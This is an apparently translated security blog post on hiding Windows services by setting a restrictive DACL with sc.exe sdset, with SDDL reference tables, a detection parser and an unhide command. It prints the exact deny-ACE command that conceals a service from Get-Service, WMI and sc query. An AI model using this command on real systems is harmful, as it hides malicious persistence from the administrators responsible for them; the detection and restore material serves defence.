
[t1543.003] using ACL to hide malicious windows services

2020-11-10 16:28:47 CN Simo

I came across an article about hiding Windows service information by setting a DACL on the service; this post is my summary of it.

Technical principle

In Windows, every service is a kind of object. A user's permission to access an object (for example to modify, delete, read or write it) is governed by the security information bound to that object, its security descriptor.

Since a service is also an object, its security descriptor can be modified so that a given class of user can no longer view or modify the service's information, or stop or delete the service.

Security descriptor structure and how it is set

According to MSDN, a security descriptor contains the following information:

  • SIDs: the owner and primary group of the object
  • DACL: allows or denies specified users/groups access to the object
  • SACL: generates audit records for the specified types of access attempts
  • A set of control bits: qualify the meaning of the security descriptor or of its individual members

The corresponding structure is SECURITY_DESCRIPTOR:

typedef struct _SECURITY_DESCRIPTOR {
  BYTE                        Revision;
  BYTE                        Sbz1;
  SECURITY_DESCRIPTOR_CONTROL Control;
  PSID                        Owner;
  PSID                        Group;
  PACL                        Sacl;
  PACL                        Dacl;
} SECURITY_DESCRIPTOR, *PISECURITY_DESCRIPTOR;

A program or user cannot manipulate this information directly; it must be set or queried through the APIs that Windows provides.

As a result, different kinds of objects may have different ways of setting their security descriptors:

  • Some can be set directly from the UI, for example file objects.
  • Some must be set with Windows built-in commands, for example service objects.
  • Some can only be set through the system API, for example processes and threads.

For these security descriptors Windows also provides a plain string representation, officially called the Security Descriptor Definition Language (SDDL). The rest of this section summarizes SDDL.

Security Descriptor Definition Language (SDDL)

According to MSDN, SDDL strings and SECURITY_DESCRIPTOR structures are converted back and forth by two API functions, one for each direction:

This makes setting security descriptors much more convenient. Some basic concepts first.

Basic concepts

  • Securable object: a Windows object that has a security descriptor (SD). All named Windows objects are securable objects, and some unnamed objects, such as processes and threads, are securable as well and also carry an SD.
  • SID: the security identifier of a user or group.
  • ACL: access control list; in practice there are two kinds, the DACL and the SACL.
  • DACL: discretionary access control list, which allows or denies specified users/groups access to the object.
  • SACL: system access control list, which generates audit records for the specified types of access attempts.
  • ACE: access control entry, the smallest unit of an access control list.
  • SDDL: Security Descriptor Definition Language, a string format for representing security descriptor information.

ACE

ACEs make up the DACL and the SACL and can be thought of as the smallest storage unit of the SD (security descriptor). The string format of an ACE is:

ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;(resource_attribute)

An empty field means no restriction. A common combination looks like this:

ace_type;;rights;;;account_sid;

ace_type

There are many ace_type values (see MSDN). This field gives the type of entry the rule applies, for example:

"A"	SDDL_ACCESS_ALLOWED	ACCESS_ALLOWED_ACE_TYPE
"D"	SDDL_ACCESS_DENIED	ACCESS_DENIED_ACE_TYPE

rights

As MSDN shows, the names of the access-right constants differ between object types. Wayne Martin's article gives part of the mapping between the ADS, SCM, service, numeric value and SDDL forms:

"CC"  ADS_RIGHT_DS_CREATE_CHILD          = 0x1,    SC_MANAGER_CONNECT, SERVICE_QUERY_CONFIG
"DC"  ADS_RIGHT_DS_DELETE_CHILD          = 0x2,    SC_MANAGER_CREATE_SERVICE, SERVICE_CHANGE_CONFIG
"LC"  ADS_RIGHT_ACTRL_DS_LIST            = 0x4,    SC_MANAGER_ENUMERATE_SERVICE, SERVICE_QUERY_STATUS
"SW"  ADS_RIGHT_DS_SELF                  = 0x8,    SC_MANAGER_LOCK, SERVICE_ENUMERATE_DEPENDENTS
"RP"  ADS_RIGHT_DS_READ_PROP             = 0x10,   SC_MANAGER_QUERY_LOCK_STATUS, SERVICE_START, 
"WP"  ADS_RIGHT_DS_WRITE_PROP            = 0x20,   SC_MANAGER_MODIFY_BOOT_CONFIG, SERVICE_STOP
"DT"  ADS_RIGHT_DS_DELETE_TREE           = 0x40,   SERVICE_PAUSE_CONTINUE
"LO"  ADS_RIGHT_DS_LIST_OBJECT           = 0x80,   SERVICE_INTERROGATE
"CR"  ADS_RIGHT_DS_CONTROL_ACCESS        = 0x100   SERVICE_USER_DEFINED_CONTROL
"RC"  READ_CONTROL                       = 0x20000 READ_CONTROL
"SD"  ADS_RIGHT_DELETE                   = 0x10000 DELETE

Access rights for the SCM and for service objects, from Service Security and Access Rights (MSDN):

SERVICE_QUERY_CONFIG (0x0001) Required to call the QueryServiceConfig and QueryServiceConfig2 functions to query the service configuration. 
SERVICE_CHANGE_CONFIG (0x0002) Required to call the ChangeServiceConfig or ChangeServiceConfig2 function to change the service configuration. Because this grants the caller the right to change the executable file that the system runs, it should be granted only to administrators.  
SERVICE_QUERY_STATUS (0x0004) Required to call the QueryServiceStatusEx function to ask the service control manager about the status of the service. 
SERVICE_ENUMERATE_DEPENDENTS (0x0008) Required to call the EnumDependentServices function to enumerate all the services dependent on the service. 
SERVICE_START (0x0010) Required to call the StartService function to start the service. 
SERVICE_STOP (0x0020) Required to call the ControlService function to stop the service. 
SERVICE_PAUSE_CONTINUE (0x0040) Required to call the ControlService function to pause or continue the service. 
SERVICE_INTERROGATE (0x0080) Required to call the ControlService function to ask the service to report its status immediately. 
SERVICE_USER_DEFINED_CONTROL(0x0100) Required to call the ControlService function to specify a user-defined control code. 
SERVICE_ALL_ACCESS (0xF01FF) Includes STANDARD_RIGHTS_REQUIRED in addition to all access rights in this table. 
READ_CONTROL Required to call the QueryServiceObjectSecurity function to query the security descriptor of the service object. 

SC_MANAGER_CONNECT (0x0001) Required to connect to the service control manager. 
SC_MANAGER_CREATE_SERVICE (0x0002) Required to call the CreateService function to create a service object and add it to the database. 
SC_MANAGER_ENUMERATE_SERVICE (0x0004) Required to call the EnumServicesStatusEx function to list the services that are in the database. 
SC_MANAGER_LOCK (0x0008) Required to call the LockServiceDatabase function to acquire a lock on the database. 
SC_MANAGER_QUERY_LOCK_STATUS (0x0010) 
SC_MANAGER_MODIFY_BOOT_CONFIG (0x0020) Required to call the NotifyBootConfigStatus function. 
SC_MANAGER_ALL_ACCESS (0xF003F) Includes STANDARD_RIGHTS_REQUIRED, in addition to all access rights in this table. 

The SDDL to ADS mapping, from ACE Strings (MSDN):

"RC"  SDDL_READ_CONTROL  READ_CONTROL 
"RP"  SDDL_READ_PROPERTY  ADS_RIGHT_DS_READ_PROP  
"WP"  SDDL_WRITE_PROPERTY  ADS_RIGHT_DS_WRITE_PROP  
"CC"  SDDL_CREATE_CHILD  ADS_RIGHT_DS_CREATE_CHILD  
"DC"  SDDL_DELETE_CHILD  ADS_RIGHT_DS_DELETE_CHILD  
"LC"  SDDL_LIST_CHILDREN  ADS_RIGHT_ACTRL_DS_LIST  
"SW"  SDDL_SELF_WRITE  ADS_RIGHT_DS_SELF  
"LO"  SDDL_LIST_OBJECT  ADS_RIGHT_DS_LIST_OBJECT  
"DT"  SDDL_DELETE_TREE  ADS_RIGHT_DS_DELETE_TREE  
"CR"  SDDL_CONTROL_ACCESS  ADS_RIGHT_DS_CONTROL_ACCESS  

The ADS enumeration values, from ads_rights_enum (systemmanager):

typedef enum 
{
  ADS_RIGHT_DELETE = 0x10000, 
  ADS_RIGHT_READ_CONTROL = 0x20000, 
  ADS_RIGHT_WRITE_DAC = 0x40000, 
  ADS_RIGHT_WRITE_OWNER = 0x80000, 
  ADS_RIGHT_SYNCHRONIZE = 0x100000, 
  ADS_RIGHT_ACCESS_SYSTEM_SECURITY = 0x1000000, 
  ADS_RIGHT_GENERIC_READ = 0x80000000, 
  ADS_RIGHT_GENERIC_WRITE = 0x40000000, 
  ADS_RIGHT_GENERIC_EXECUTE = 0x20000000, 
  ADS_RIGHT_GENERIC_ALL = 0x10000000, 
  ADS_RIGHT_DS_CREATE_CHILD = 0x1, 
  ADS_RIGHT_DS_DELETE_CHILD = 0x2, 
  ADS_RIGHT_ACTRL_DS_LIST = 0x4, 
  ADS_RIGHT_DS_SELF = 0x8, 
  ADS_RIGHT_DS_READ_PROP = 0x10, 
  ADS_RIGHT_DS_WRITE_PROP = 0x20, 
  ADS_RIGHT_DS_DELETE_TREE = 0x40, 
  ADS_RIGHT_DS_LIST_OBJECT = 0x80, 
  ADS_RIGHT_DS_CONTROL_ACCESS = 0x100
} ADS_RIGHTS_ENUM;

account_sid

A SID identifies the owner or the group an object belongs to. In an ACE, account_sid can be either a SID string (S-R-I-S-S) or one of the string constants defined in Sddl.h, also known as the well-known SIDs:

"AN"    SDDL_ANONYMOUS                  Anonymous logon. The corresponding RID is SECURITY_ANONYMOUS_LOGON_RID.
"AO"    SDDL_ACCOUNT_OPERATORS          Account operators. The corresponding RID is DOMAIN_ALIAS_RID_ACCOUNT_OPS.
"AU"    SDDL_AUTHENTICATED_USERS        Authenticated users. The corresponding RID is SECURITY_AUTHENTICATED_USER_RID.
"BA"    SDDL_BUILTIN_ADMINISTRATORS     Built-in administrators. The corresponding RID is DOMAIN_ALIAS_RID_ADMINS.
"BG"    SDDL_BUILTIN_GUESTS             Built-in guests. The corresponding RID is DOMAIN_ALIAS_RID_GUESTS.
"BO"    SDDL_BACKUP_OPERATORS           Backup operators. The corresponding RID is DOMAIN_ALIAS_RID_BACKUP_OPS.
"BU"    SDDL_BUILTIN_USERS              Built-in users. The corresponding RID is DOMAIN_ALIAS_RID_USERS.
"CA"    SDDL_CERT_SERV_ADMINISTRATORS   Certificate publishers. The corresponding RID is DOMAIN_GROUP_RID_CERT_ADMINS.
"CD"    SDDL_CERTSVC_DCOM_ACCESS        Users who can connect to certification authorities using Distributed Component Object Model (DCOM). The corresponding RID is DOMAIN_ALIAS_RID_CERTSVC_DCOM_ACCESS_GROUP.
"CG"    SDDL_CREATOR_GROUP              Creator group. The corresponding RID is SECURITY_CREATOR_GROUP_RID.
"CO"    SDDL_CREATOR_OWNER              Creator owner. The corresponding RID is SECURITY_CREATOR_OWNER_RID.
"DA"    SDDL_DOMAIN_ADMINISTRATORS      Domain administrators. The corresponding RID is DOMAIN_GROUP_RID_ADMINS.
"DC"    SDDL_DOMAIN_COMPUTERS           Domain computers. The corresponding RID is DOMAIN_GROUP_RID_COMPUTERS.
"DD"    SDDL_DOMAIN_DOMAIN_CONTROLLERS  Domain controllers. The corresponding RID is DOMAIN_GROUP_RID_CONTROLLERS.
"DG"    SDDL_DOMAIN_GUESTS              Domain guests. The corresponding RID is DOMAIN_GROUP_RID_GUESTS.
"DU"    SDDL_DOMAIN_USERS               Domain users. The corresponding RID is DOMAIN_GROUP_RID_USERS.
"EA"    SDDL_ENTERPRISE_ADMINS              Enterprise administrators. The corresponding RID is DOMAIN_GROUP_RID_ENTERPRISE_ADMINS.
"ED"    SDDL_ENTERPRISE_DOMAIN_CONTROLLERS  Enterprise domain controllers. The corresponding RID is SECURITY_SERVER_LOGON_RID.
"HI"    SDDL_ML_HIGH                    High integrity level. The corresponding RID is SECURITY_MANDATORY_HIGH_RID.
"IU"    SDDL_INTERACTIVE                Interactively logged-on user. This is a group identifier added to the token of a process when it was logged on interactively. The corresponding logon type is LOGON32_LOGON_INTERACTIVE. The corresponding RID is SECURITY_INTERACTIVE_RID.
"LA"    SDDL_LOCAL_ADMIN                Local administrator. The corresponding RID is DOMAIN_USER_RID_ADMIN.
"LG"    SDDL_LOCAL_GUEST                Local guest. The corresponding RID is DOMAIN_USER_RID_GUEST.
"LS"    SDDL_LOCAL_SERVICE              Local service account. The corresponding RID is SECURITY_LOCAL_SERVICE_RID.
"LW"    SDDL_ML_LOW                     Low integrity level. The corresponding RID is SECURITY_MANDATORY_LOW_RID.
"ME"    SDDL_ML_MEDIUM                  Medium integrity level. The corresponding RID is SECURITY_MANDATORY_MEDIUM_RID.
"MU"    SDDL_PERFMON_USERS              Performance Monitor users.
"NO"    SDDL_NETWORK_CONFIGURATION_OPS  Network configuration operators. The corresponding RID is DOMAIN_ALIAS_RID_NETWORK_CONFIGURATION_OPS.
"NS"    SDDL_NETWORK_SERVICE            Network service account. The corresponding RID is SECURITY_NETWORK_SERVICE_RID.
"NU"    SDDL_NETWORK                    Network logon user. This is a group identifier added to the token of a process when it was logged on across a network. The corresponding logon type is LOGON32_LOGON_NETWORK. The corresponding RID is SECURITY_NETWORK_RID.
"PA"    SDDL_GROUP_POLICY_ADMINS        Group Policy administrators. The corresponding RID is DOMAIN_GROUP_RID_POLICY_ADMINS.
"PO"    SDDL_PRINTER_OPERATORS          Printer operators. The corresponding RID is DOMAIN_ALIAS_RID_PRINT_OPS.
"PS"    SDDL_PERSONAL_SELF              Principal self. The corresponding RID is SECURITY_PRINCIPAL_SELF_RID.
"PU"    SDDL_POWER_USERS                Power users. The corresponding RID is DOMAIN_ALIAS_RID_POWER_USERS.
"RC"    SDDL_RESTRICTED_CODE            Restricted code. This is a restricted token created using the CreateRestrictedToken function. The corresponding RID is SECURITY_RESTRICTED_CODE_RID.
"RD"    SDDL_REMOTE_DESKTOP             Terminal server users. The corresponding RID is DOMAIN_ALIAS_RID_REMOTE_DESKTOP_USERS.
"RE"    SDDL_REPLICATOR                 Replicator. The corresponding RID is DOMAIN_ALIAS_RID_REPLICATOR.
"RO"    SDDL_ENTERPRISE_RO_DCs          Enterprise Read-only domain controllers. The corresponding RID is DOMAIN_GROUP_RID_ENTERPRISE_READONLY_DOMAIN_CONTROLLERS.
"RS"    SDDL_RAS_SERVERS                RAS servers group. The corresponding RID is DOMAIN_ALIAS_RID_RAS_SERVERS.
"RU"    SDDL_ALIAS_PREW2KCOMPACC        Alias to grant permissions to accounts that use applications compatible with operating systems previous to Windows 2000. The corresponding RID is DOMAIN_ALIAS_RID_PREW2KCOMPACCESS.
"SA"    SDDL_SCHEMA_ADMINISTRATORS      Schema administrators. The corresponding RID is DOMAIN_GROUP_RID_SCHEMA_ADMINS.
"SI"    SDDL_ML_SYSTEM                  System integrity level. The corresponding RID is SECURITY_MANDATORY_SYSTEM_RID.
"SO"    SDDL_SERVER_OPERATORS           Server operators. The corresponding RID is DOMAIN_ALIAS_RID_SYSTEM_OPS.
"SU"    SDDL_SERVICE                    Service logon user. This is a group identifier added to the token of a process when it was logged as a service. The corresponding logon type is LOGON32_LOGON_SERVICE. The corresponding RID is SECURITY_SERVICE_RID.
"SY"    SDDL_LOCAL_SYSTEM               Local system. The corresponding RID is SECURITY_LOCAL_SYSTEM_RID.
"WD"    SDDL_EVERYONE                   Everyone. The corresponding RID is SECURITY_WORLD_RID.

ACL inheritance

To be completed.

Using SDDL to hide a service

For a normally added service, PowerShell or sc.exe shows the service information directly:

PS C:\WINDOWS\system32> Get-Service -Name SWCUEngine

Status   Name               DisplayName
------   ----               -----------
Running  SWCUEngine         SWCUEngine

After the service's SD is modified, querying the service reports "ObjectNotFound", which achieves the hiding:

PS C:\WINDOWS\system32> & $env:SystemRoot\System32\sc.exe sdset SWCUEngine "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
[SC] SetServiceObjectSecurity SUCCESS
PS C:\WINDOWS\system32> Get-Service -Name SWCUEngine
Get-Service : Cannot find any service with service name 'SWCUEngine'.
At line:1 char:1
+ Get-Service -Name SWCUEngine
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (SWCUEngine:String) [Get-Service], ServiceCommandException
    + FullyQualifiedErrorId : NoServiceFoundForGivenName,Microsoft.PowerShell.Commands.GetServiceCommand

Looking at the ACEs that were set: "D:" marks the DACL; each ACE is enclosed in parentheses and its fields are separated by semicolons.

"D;;DCLCWPDTSD;;;IU": denies interactive users the following rights:

  • DC: SERVICE_CHANGE_CONFIG, modify the service configuration
  • LC: SERVICE_QUERY_STATUS, query the service status
  • WP: SERVICE_STOP, stop the service
  • DT: SERVICE_PAUSE_CONTINUE, pause and resume the service
  • SD: DELETE, delete the service

"S:" marks the SACL; "AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD" audits failed access attempts on the service by anyone (Everyone) for the listed rights.
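To make the ACE walkthrough above concrete from the defender's side, here is an added example (not code from the original post) that parses an SDDL string into its sections and ACEs, maps the rights codes to the service constants from the tables above, and flags the deny-ACE pattern used to hide the service. The rights table, the watched trustees (IU, SU, BA) and the two sample descriptors are taken from this post; anything else is my own construction.

```python
import re

# Added example (not from the original post): a minimal SDDL parser whose
# rights table follows the service-object mapping in the tables above.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE", "LO": "SERVICE_INTERROGATE",
    "CR": "SERVICE_USER_DEFINED_CONTROL", "SD": "DELETE",
    "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
# Trustees denied in the walkthrough: interactive, service logon, built-in admins.
WATCHED_TRUSTEES = {"IU", "SU", "BA"}
SECTION_RE = re.compile(r"([OGDS]):((?:(?![OGDS]:).)*)")  # O:/G:/D:/S: sections
ACE_RE = re.compile(r"\(([^)]*)\)")  # one parenthesised ACE

def split_rights(rights):
    """Split a rights field into two-letter codes; keep a hex mask whole."""
    if rights.lower().startswith("0x"):
        return [rights]
    return [rights[i:i + 2] for i in range(0, len(rights), 2)]

def parse_sddl(sddl):
    """Parse an SDDL string into owner, group, DACL ACEs and SACL ACEs."""
    result = {"owner": None, "group": None, "dacl": [], "sacl": []}
    for tag, body in SECTION_RE.findall(sddl):
        if tag in ("O", "G"):
            result["owner" if tag == "O" else "group"] = body
            continue
        aces = []
        for ace in ACE_RE.findall(body):
            f = ace.split(";")  # type;flags;rights;object_guid;inherit_guid;sid
            if len(f) < 6:
                raise ValueError("malformed ACE: " + ace)
            aces.append({"type": f[0], "flags": f[1],
                         "rights": split_rights(f[2]), "trustee": f[5]})
        result["dacl" if tag == "D" else "sacl"] = aces
    return result

def hidden_service_indicators(sddl):
    """Deny ACEs that strip SERVICE_QUERY_STATUS (LC) from a watched trustee,
    the pattern that makes Get-Service / sc query report the service missing."""
    hits = []
    for ace in parse_sddl(sddl)["dacl"]:
        if (ace["type"] == "D" and ace["trustee"] in WATCHED_TRUSTEES
                and "LC" in ace["rights"]):
            hits.append((ace["trustee"],
                         [SERVICE_RIGHTS.get(r, r) for r in ace["rights"]]))
    return hits

# Constructed inputs: the hidden and restored descriptors from the walkthrough.
HIDDEN = ("D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)"
          "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
          "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
NORMAL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
          "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")

if __name__ == "__main__":
    print(hidden_service_indicators(HIDDEN), hidden_service_indicators(NORMAL))
```

Feeding it the output of sc.exe sdshow for each service in the registry's Services key gives a quick audit for this hiding pattern; the restored descriptor produces no hits.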

Once hidden, neither services.exe, Get-Service, sc query nor any other service control tool can retrieve the corresponding information. The effect is as follows:

# None of the following three ways of querying service information returns anything
PS C:\WINDOWS\system32> Get-Service | Select-Object Name | Select-String -Pattern 'SWCUEngine'
PS C:\WINDOWS\system32> Get-WmiObject Win32_Service | Select-String -Pattern 'SWCUEngine'
PS C:\WINDOWS\system32> & $env:SystemRoot\System32\sc.exe query | Select-String -Pattern 'SWCUEngine'
PS C:\WINDOWS\system32

If the blue team knows the name of the malicious service, it can tell whether the service exists from the response to stopping it, for example:

# Stopping the non-existent JoshNoSuchService service gives an InvalidOperationException
PS C:\WINDOWS\system32> Set-Service -Name JoshNoSuchService -Status Stopped
Set-Service : Service JoshNoSuchService was not found on computer '.'.
At line:1 char:1
+ Set-Service -Name JoshNoSuchService -Status Stopped
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (.:String) [Set-Service], InvalidOperationException
    + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.Commands.SetServiceCommand

# Stopping the existing but hidden SWCUEngine service gives a ServiceCommandException
PS C:\WINDOWS\system32> Set-Service -Name SWCUEngine -Status Stopped
Set-Service : Service 'SWCUEngine (SWCUEngine)' cannot be configured due to the following error: Access is denied
At line:1 char:1
+ Set-Service -Name SWCUEngine -Status Stopped
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (System.ServiceProcess.ServiceController:ServiceController) [Set-Service],
   ServiceCommandException
    + FullyQualifiedErrorId : CouldNotSetService,Microsoft.PowerShell.Commands.SetServiceCommand

Once the service's existence is confirmed, unhiding it is just as easy:

# Use sc.exe to modify the target service's SDDL to unhide it
PS C:\WINDOWS\system32> & $env:SystemRoot\System32\sc.exe sdset SWCUEngine "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
[SC] SetServiceObjectSecurity SUCCESS

# Now Get-Service can view the corresponding service information again
PS C:\WINDOWS\system32> Get-Service -Name 'SWCUEngine'

Status   Name               DisplayName
------   ----               -----------
Running  SWCUEngine         SWCUEngine

References

Copyright notice
This article was written by [CN Simo]; please include a link to the original when reposting. Thanks.